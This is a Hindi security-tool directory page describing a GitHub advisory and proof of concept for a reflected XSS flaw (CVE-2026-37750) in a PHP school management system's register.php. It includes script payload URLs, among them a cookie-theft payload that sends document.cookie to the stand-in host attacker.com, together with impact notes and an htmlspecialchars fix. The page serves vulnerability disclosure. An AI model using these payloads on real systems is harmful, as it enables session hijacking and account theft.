Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/menevarad007/cve-2026-37750
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षा
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

# स्कूल प्रबंधन प्रणाली 1.0 के लिए रिफ्लेक्टेड XSS प्रूफ-ऑफ-कॉन्सेप्ट register.php में type पैरामीटर के माध्यम से बिना प्रमाणीकरण के JavaScript निष्पादन का प्रदर्शन, प्रभाव विश्लेषण और सुधार मार्गदर्शन के साथ।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-37750 — स्कूल प्रबंधन प्रणाली 1.0 - रिफ्लेक्टेड XSS

विवरण

फ़ील्डजानकारी
CVE IDCVE-2026-37750
प्रकाररिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
गंभीरतामध्यम (CVSSv3: 6.1)
विक्रेताmahmoudai1
उत्पादस्कूल प्रबंधन प्रणाली
संस्करण1.0
खोजकर्तावरद एपी मेने
दिनांक2026-04-16
CWECWE-79

विवरण

mahmoudai1 द्वारा स्कूल प्रबंधन प्रणाली 1.0 में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, बिना प्रमाणीकरण के दूरस्थ हमलावरों को register.php में अस्वच्छित type पैरामीटर के माध्यम से पीड़ितों के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देती है। पैरामीटर पंक्ति 22 पर h1 टैग के अंदर और पंक्ति 26 पर form action विशेषता के अंदर बिना एस्केपिंग के प्रतिबिंबित होता है। इस भेद्यता का शोषण करने के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है।

CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 मध्यम (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


उत्पाद विवरण

स्कूल प्रबंधन प्रणाली 1.0 GitHub पर mahmoudai1 द्वारा एक PHP/MySQL वेब एप्लिकेशन है जिसका उपयोग स्कूलों में छात्रों, शिक्षकों और अभिभावकों के प्रबंधन के लिए किया जाता है।

विक्रेता URL: https://github.com/mahmoudai1/school-management-system


भेद्य फ़ाइल

register.php — पंजीकरण फ़ॉर्म (कोई प्रमाणीकरण आवश्यक नहीं)


भेद्य कोड

पंक्ति 22: echo ucfirst($_REQUEST['type'])

पंक्ति 26: echo $_REQUEST['type']

कोई htmlspecialchars() उपयोग नहीं किया गया — कच्चा उपयोगकर्ता इनपुट सीधे HTML में प्रतिबिंबित होता है।


प्रमाण की अवधारणा

पूर्वापेक्षाएँ:

  • कोई प्रमाणीकरण आवश्यक नहीं
  • लक्ष्य स्कूल प्रबंधन प्रणाली 1.0 चला रहा होना चाहिए

चरण 1 — ब्राउज़र खोलें और इस URL पर जाएँ: http://target/register.php?type=script-alert-document.cookie-/script

चरण 2 — JavaScript ब्राउज़र में निष्पादित होता है परिणाम: सत्र कुकीज़ दिखाने वाला अलर्ट बॉक्स प्रकट होता है।

चरण 3 — कुकी चोरी पेलोड: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script चरण 4 — फ़ॉर्म एक्शन इंजेक्शन पेलोड: http://target/register.php?type="-script-alert(1)-/script

दो इंजेक्शन बिंदु पुष्टि किए गए:

इंजेक्शन बिंदु 1 — h1 टैग के अंदर (पंक्ति 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

आउटपुट:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

इंजेक्शन बिंदु 2 — form action विशेषता के अंदर (पंक्ति 26):

root@kitploit:~
echo $_REQUEST['type']

आउटपुट:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

प्रभाव

  • कुकी चोरी के माध्यम से सत्र अपहरण
  • फ़िशिंग — नकली लॉगिन फ़ॉर्म इंजेक्ट करना
  • रीडायरेक्ट के माध्यम से मैलवेयर वितरण
  • कोई प्रमाणीकरण आवश्यक नहीं

उपचार

पंक्ति 22 का समाधान: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

पंक्ति 26 का समाधान: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


संदर्भ

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

खोजकर्ता

वरद एपी मेने ईमेल: [email protected] GitHub: https://github.com/menevarad007

टूल डाउनलोड करें